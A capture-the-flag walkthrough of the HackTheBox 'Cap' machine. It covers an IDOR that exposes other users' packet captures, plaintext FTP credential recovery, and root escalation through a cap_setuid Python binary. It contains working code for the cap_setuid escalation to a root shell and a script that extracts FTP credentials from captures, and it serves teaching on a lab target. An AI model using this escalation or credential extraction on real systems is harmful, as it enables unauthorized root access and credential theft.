We covered Insecure Direct Object Reference (IDOR) exploitation along with Python privilege escalation through a Linux file capability as part of the HackTheBox Cap CREST CRT Track.

Cap is an easy-difficulty Linux machine running an HTTP server that lets users capture unencrypted network traffic. Improper access controls result in an Insecure Direct Object Reference (IDOR) that gives access to another user's capture. The capture contains plaintext credentials that can be used to gain a foothold. A Linux capability is then leveraged to get root.

Initial Enumeration

I started with an Nmap scan using nmap -A <IP_ADDRESS> on the target IP address. This revealed several open ports:

  • Port 21 (FTP): I found that anonymous access was allowed, but there was nothing useful there.
  • Port 22 (SSH): I didn’t have any credentials for this initially.
  • Port 80 (HTTP): This became my primary focus.

I also identified the web server as Gunicorn.

Web Application Enumeration & Exploitation

Navigating to the web server on port 80, I discovered a network monitoring dashboard. The dashboard displayed the username “Nathan” and featured a “Security Snapshot” that allowed downloading .pcap (packet capture) files. The URL structure for these downloads was /data/<number>, for instance /data/2.

I manually tested other numbers in the URL: /data/1 downloaded a different .pcap file, /data/0 downloaded another with a different packet count, and /data/3 redirected back to the dashboard. The numeric identifier was the only thing the server consulted; it never checked that the requesting session owned the capture, so captures belonging to other users were directly reachable. That is an Insecure Direct Object Reference (IDOR) vulnerability. I skipped directory busting with tools like Gobuster because the download endpoint was already exposed in the dashboard's own links and the IDOR gave direct access to the interesting files.
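To make the missing check concrete, here is an added example (not the Cap application's source, which is not public on this page) that simulates the /data/<number> handler as a plain Python function. The capture store, the owner names "admin" and "alice", and the 302 status standing in for the redirect to the dashboard are all assumptions made for the illustration; enumerate_accessible mimics the manual /data/0 .. /data/3 test described above.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class Capture:
    owner: str
    pcap: bytes


# Constructed data store (assumption): capture 2 belongs to nathan, 0 and 1 to other users.
CAPTURES: Dict[int, Capture] = {
    0: Capture(owner="admin", pcap=b"\xd4\xc3\xb2\xa1 capture 0"),
    1: Capture(owner="alice", pcap=b"\xd4\xc3\xb2\xa1 capture 1"),
    2: Capture(owner="nathan", pcap=b"\xd4\xc3\xb2\xa1 capture 2"),
}

Response = Tuple[int, bytes]  # (HTTP status, body); 302 models the redirect back to the dashboard


def download_vulnerable(requesting_user: str, capture_id: int) -> Response:
    """IDOR: the numeric id is the only input consulted; the requester is never checked."""
    cap = CAPTURES.get(capture_id)
    if cap is None:
        return 302, b""          # /data/3 behaviour from the write-up: id does not exist
    return 200, cap.pcap


def download_fixed(requesting_user: str, capture_id: int) -> Response:
    """Authorization fix: the lookup is scoped to the requester, and 'not yours' is
    indistinguishable from 'does not exist' so the id space cannot be enumerated."""
    cap = CAPTURES.get(capture_id)
    if cap is None or cap.owner != requesting_user:
        return 302, b""
    return 200, cap.pcap


def enumerate_accessible(handler: Callable[[str, int], Response], user: str, max_id: int) -> List[int]:
    """Walk /data/0 .. /data/max_id as `user` and report which ids hand back a file."""
    return [i for i in range(max_id + 1) if handler(user, i)[0] == 200]


if __name__ == "__main__":
    print("vulnerable:", enumerate_accessible(download_vulnerable, "nathan", 3))
    print("fixed:     ", enumerate_accessible(download_fixed, "nathan", 3))
```

The fix keys the lookup on the authenticated identity rather than trusting the client-supplied id. Returning the same response for a missing capture and for someone else's capture matters too: a distinct 403 would still let an attacker map which ids exist.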

Packet Capture Analysis

I opened the downloaded .pcap files in Wireshark. I first checked “Protocol Hierarchy” under “Statistics” to guide the investigation and noticed that FTP made up a significant portion of the traffic (34%). Since FTP sends its USER and PASS commands in plaintext over the control connection, credentials can often be recovered from a capture. Filtering for FTP traffic, I uncovered the username “Nathan” and his password.
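The same recovery can be scripted instead of done by hand in Wireshark. The following is an added example, not code from the write-up: a minimal classic-pcap reader that walks Ethernet/IPv4/TCP, pairs USER/PASS commands per client connection, and marks a pair as accepted only when the server replies 230. The sample traffic is constructed inline (the IP addresses, the password strings and the server banner are all invented; the real capture is not reproduced here), so the script runs offline.

```python
import struct
from typing import Dict, Iterator, List, Optional, Tuple

PCAP_MAGIC_LE = 0xA1B2C3D4   # classic pcap magic as read with "<I" from a little-endian file
PCAP_MAGIC_BE = 0xD4C3B2A1   # the same bytes when the file was written big-endian
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def build_tcp_frame(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame around payload. Checksums stay zero; the parser never validates them."""
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in src_ip.split(".")), bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames: List[bytes]) -> bytes:
    """Wrap frames in a classic little-endian pcap file (link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_frames(pcap: bytes) -> Iterator[bytes]:
    """Yield each captured frame; both byte orders of the classic format are accepted."""
    magic = struct.unpack("<I", pcap[:4])[0]
    endian = {PCAP_MAGIC_LE: "<", PCAP_MAGIC_BE: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    offset = 24
    while offset + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[offset:offset + 16])[2]
        offset += 16
        yield pcap[offset:offset + incl_len]
        offset += incl_len


def tcp_segment(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """(src_ip, dst_ip, src_port, dst_port, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    if ip[9] != IPPROTO_TCP or len(ip) < ihl + 20:
        return None
    tcp = ip[ihl:total_len]                      # slice by IP total length to drop Ethernet padding
    src_port, dst_port = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return (".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20])), src_port, dst_port, tcp[data_off:])


def extract_ftp_credentials(pcap: bytes) -> List[Dict[str, object]]:
    """Pair USER/PASS per client connection; a pair is 'accepted' once the server replies 230."""
    sessions: Dict[Tuple[str, int], Dict[str, object]] = {}
    found: List[Dict[str, object]] = []
    for frame in iter_frames(pcap):
        seg = tcp_segment(frame)
        if seg is None:
            continue
        src_ip, dst_ip, src_port, dst_port, payload = seg
        text = payload.decode("ascii", errors="replace").strip()
        if dst_port == FTP_PORT:                 # client -> server command
            sess = sessions.setdefault((src_ip, src_port), {"user": None, "pending": None})
            if text.upper().startswith("USER "):
                sess["user"] = text[5:]
            elif text.upper().startswith("PASS "):
                sess["pending"] = {"client": src_ip, "user": sess["user"], "password": text[5:], "accepted": False}
                found.append(sess["pending"])
        elif src_port == FTP_PORT:               # server -> client reply
            sess = sessions.get((dst_ip, dst_port))
            if sess and sess["pending"] is not None and text[:3] in ("230", "530"):
                sess["pending"]["accepted"] = text.startswith("230")
                sess["pending"] = None
    return found


def sample_capture() -> bytes:
    """Constructed sample traffic (not the real HTB capture): one failed and one successful login."""
    c, s = "10.10.14.1", "10.10.10.245"   # assumed client and server addresses
    frames = [
        build_tcp_frame(s, c, 21, 54321, b"220 FTP server ready\r\n"),
        build_tcp_frame(c, s, 54321, 21, b"USER nathan\r\n"),
        build_tcp_frame(s, c, 21, 54321, b"331 Please specify the password.\r\n"),
        build_tcp_frame(c, s, 54321, 21, b"PASS wrong-pass\r\n"),
        build_tcp_frame(s, c, 21, 54321, b"530 Login incorrect.\r\n"),
        build_tcp_frame(c, s, 54321, 21, b"USER nathan\r\n"),
        build_tcp_frame(s, c, 21, 54321, b"331 Please specify the password.\r\n"),
        build_tcp_frame(c, s, 54321, 21, b"PASS example-pass\r\n"),
        build_tcp_frame(s, c, 21, 54321, b"230 Login successful.\r\n"),
    ]
    return build_pcap(frames)


if __name__ == "__main__":
    for cred in extract_ftp_credentials(sample_capture()):
        print(cred)
```

Point the functions at the bytes of a downloaded /data/<n> file instead of sample_capture() to run it against real traffic. Checking for the 230 reply is worth the extra lines: a capture often contains failed attempts, and only the accepted pair is the one to try over SSH.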

Privilege Escalation

With the discovered credentials (Nathan and his password), I logged in via SSH. Once I had a shell, I ran LinPEAS, a privilege escalation enumeration tool. LinPEAS reported that the Python binary had the cap_setuid capability set (the form getcap prints as cap_setuid+ep). That capability lets the process change its user ID without being setuid-root, so Python could switch to UID 0, which is root.

I used the following Python commands to escalate privileges (the capability is attached to one specific Python binary, so invoke that exact path if plain python does not carry it):

  • python (to start the Python interpreter as Nathan)
  • import os
  • os.setuid(0) (to change the user ID to 0, which is root)
  • os.system("/bin/bash") (to execute a bash shell as root)

This successfully granted me a root shell.
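The four interactive commands above are the whole exploit; what a practitioner usually wants around them is the check that the interpreter in hand actually carries the capability, and a clear failure when it does not. The script below is an added example, not the author's commands: it parses getcap -r / output (both the older "path = caps" and newer "path caps" layouts), keeps only entries where cap_setuid is in the Effective set, and performs the os.setuid(0) step with the PermissionError case handled. The SAMPLE_GETCAP text is constructed for illustration and is not the output from the Cap machine.

```python
import os
import re
import subprocess
from typing import List, Tuple

# getcap output differs between libcap versions ("/path = cap_setuid+ep" on older
# builds, "/path cap_setuid=ep" on newer ones); accept both shapes.
_GETCAP_LINE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>.+)$")


def parse_getcap(output: str) -> List[Tuple[str, str]]:
    """(path, capability text) for each non-empty getcap line."""
    entries = []
    for line in output.splitlines():
        m = _GETCAP_LINE.match(line.strip())
        if m:
            entries.append((m.group("path"), m.group("caps").strip()))
    return entries


def has_effective_setuid(caps: str) -> bool:
    """True when cap_setuid is in the Effective set (flag 'e'). A Permitted-only or
    Inheritable-only grant is not directly usable by a plain os.setuid(0) call."""
    for clause in caps.split():
        parts = re.split(r"[+=]", clause, maxsplit=1)
        if len(parts) != 2:
            continue
        names, flags = parts
        if (names in ("", "all") or "cap_setuid" in names.split(",")) and "e" in flags:
            return True
    return False


def setuid_capable_binaries(getcap_output: str) -> List[str]:
    return [path for path, caps in parse_getcap(getcap_output) if has_effective_setuid(caps)]


def is_root() -> bool:
    return os.geteuid() == 0


def try_escalate() -> bool:
    """The os.setuid(0) step from the write-up. Without CAP_SETUID (or an euid that is
    already 0) the kernel refuses and Python raises PermissionError, so report False."""
    try:
        os.setuid(0)
    except PermissionError:
        return False
    return is_root()


def spawn_root_shell() -> None:
    """Replace the interpreter with bash. Executing a binary with euid 0 gives the new
    process a full capability set, so the shell is ordinary root, not just 'cap_setuid'."""
    if not try_escalate():
        raise SystemExit("this interpreter does not carry cap_setuid; run it with the binary getcap reported")
    os.execv("/bin/bash", ["/bin/bash"])


# Constructed sample of `getcap -r /` output (assumption, not from the machine).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/traceroute6.iputils = cap_net_raw+p
/opt/tool cap_setuid,cap_net_bind_service=p
"""


if __name__ == "__main__":
    try:
        proc = subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL, text=True)
        hits = setuid_capable_binaries(proc.stdout)
    except FileNotFoundError:
        hits = []                                 # getcap not installed; fall back to the sample
        print("getcap missing; parsing sample:", setuid_capable_binaries(SAMPLE_GETCAP))
    print("cap_setuid+ep binaries:", hits or "none")
    if any("python" in h for h in hits):
        spawn_root_shell()
```

Run the script with the exact interpreter path getcap listed (for example /usr/bin/python3.8 script.py rather than python script.py); file capabilities belong to the file, not to whatever python happens to be first in PATH, and /opt/tool in the sample shows why the flag letters matter: cap_setuid is present but only Permitted, so setuid(0) would still fail there.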

Technical Commands

Here are the technical commands I used:

  • nmap -A <IP_ADDRESS>
  • python
  • import os
  • os.setuid(0)
  • os.system("/bin/bash")

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.